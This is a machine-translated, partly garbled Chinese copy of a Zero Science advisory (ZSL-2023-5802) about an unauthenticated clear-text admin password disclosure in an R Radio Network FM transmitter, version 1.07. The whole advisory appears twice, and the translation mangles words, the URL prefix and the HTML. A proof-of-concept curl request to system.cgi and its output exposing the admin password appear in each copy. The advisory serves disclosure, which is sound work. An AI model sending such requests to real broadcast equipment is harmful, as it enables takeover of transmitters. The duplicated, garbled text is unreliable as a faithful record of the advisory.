R无线电网络FM发射器1.07 System.CGI密码披露
vendor: R无线电网络
产品网页: http://www.pktc.ac.th
受影响的版本: 1.07
摘要: R无线电FM发射器,其中包括FM激发仪和
FM放大器参数设置。
DESC:发射器遭受不当访问控制
这允许一个未经身分的演员直接引用
system.cgi端点并披露了的清晰文本密码
管理用户允许身份验证旁路和FM站设置
使用权。
在: CSBTECHDEVICE上进行了测试
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5802
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5802.php
09.10.2023
- -
$ curl -s 3http://192.168.70.12/system.cgi
htmlheadtitlesystem设置/标题
.
.
用户的密码'admin'/tdtdinput类型=密码名称=pw size=10 maxlength=10 value='testingingus'/td
.
.
$
vendor: R无线电网络
产品网页: http://www.pktc.ac.th
受影响的版本: 1.07
摘要: R无线电FM发射器,其中包括FM激发仪和
FM放大器参数设置。
DESC:发射器遭受不当访问控制
这允许一个未经身分的演员直接引用
system.cgi端点并披露了的清晰文本密码
管理用户允许身份验证旁路和FM站设置
使用权。
在: CSBTECHDEVICE上进行了测试
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5802
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5802.php
09.10.2023
- -
$ curl -s 3http://192.168.70.12/system.cgi
htmlheadtitlesystem设置/标题
.
.
用户的密码'admin'/tdtdinput类型=密码名称=pw size=10 maxlength=10 value='testingingus'/td
.
.
$